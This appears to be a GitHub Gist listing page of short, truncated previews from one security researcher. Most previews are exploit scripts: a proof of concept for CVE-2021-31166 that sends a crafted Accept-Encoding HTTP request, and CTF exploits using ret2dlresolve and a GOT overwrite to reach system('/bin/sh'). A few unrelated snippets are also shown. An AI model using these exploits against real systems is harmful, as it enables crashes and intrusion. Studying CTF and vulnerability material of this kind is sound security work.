hugsy / constexpr_rand.cc
Created Jul 21, 2022
Basic (bad) experiments for a constexpr rand() function
View constexpr_rand.cc
//
// Requires C++20
//
#include <cstdint>
#include <iostream>
#include <string>
constexpr static auto to_int(const char* str, int offset) {
    return static_cast<std::uint32_t>(str[offset] - '0') * 10 +
View streams1.cpp
//
// http://web.archive.org/web/20150617011338/http://win32.mvps.org/ntfs/dump_ntfs_streams.cpp
//
#include <windows.h>
#include <stdio.h>
#pragma hdrstop
View Microsoft.PowerShell_profile.ps1
Import-Module posh-git
Import-Module oh-my-posh
Import-Module -Name Terminal-Icons
Set-PoshPrompt slimfat
Set-PSReadlineOption -EditMode Emacs
Set-PSReadLineKeyHandler -Chord Ctrl+LeftArrow -Function BackwardWord
Set-PSReadLineKeyHandler -Chord Ctrl+RightArrow -Function NextWord
# Set-PSReadLineKeyHandler -Chord Ctrl+Backspace -Function BackwardKillWord
View cve-2021-31166.py
#!/usr/bin/python3.9
import socket
s = socket.socket()
s.connect( ("192.168.57.99", 80) )
s.send(b"""POST / HTTP/1.1\r
Host: 192.168.57.99\r
Accept-Encoding: w00t\r
Accept-Encoding: \r
hugsy / xp.py
Created Mar 25, 2021
securinet - death_note
View xp.py
#!/usr/bin/env python3.8
"""
death_note - securinets quals 2021
@_hugsy_
$ checksec ./death_note
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
hugsy / xp.py
Last active Mar 25, 2021
securinet - membership
View xp.py
#!/usr/bin/env python3.9
"""
membership - securinets quals 2021
@_hugsy_
$ ./xp.py remote
[*] '/home/hugsy/ctf/securinets_quals_2021/membership/membership'
Arch: amd64-64-little
RELRO: Full RELRO
hugsy / xp.py
Created Mar 21, 2021
securinet - killshot
View xp.py
#!/usr/bin/env python3.8
"""
$ ./xp.py remote
[+] Opening connection to bin.q21.ctfsecurinets.com on port 1338: Done
[*] step 1: leak stuff
[+] leaked addresses:
0x563765daa240
0x563765da9b10
0x7ffd0d86b5e0
hugsy / xp.py
Created Mar 15, 2021
utctf 2021 - resolve
View xp.py
#!/usr/bin/env python3.9
#
# This exploits `ret2dlresolve` technique: the idea behind this attack is
# to forge fake structures to force the LD runtime resolver to resolve and
# execute `system('/bin/sh')`.
#
# To do that, we forge 2 objects, the Rela (holding the symbol offset) and
# the Sym (holding the symbol information).
#
# Note: if using this attack, offsets must be calculated precisely and remember
hugsy / xp.py
Created Mar 13, 2021
utctf 2021 - monke
View xp.py
#!/usr/bin/env python3.8
"""
[*] getting control of banana[1] via banana[3]...
[*] leaking atoi in libc...
[+] leaking atoi(): 7f42bbdfa7a0
[+] libc base: 7f42bbdba000
[+] system: 7f42bbe09550
[*] overwrite atoi@got with system...
[*] trigger system()
View babyrop.py
#!/usr/bin/env python3.8
import os, sys
from pwn import *
context.update(arch="amd64", endian="little", os="linux",
               terminal=["tmux", "split-window", "-v", "-p 75"],)
LOCAL = True
TARGET_ELF = os.path.realpath("./babyrop")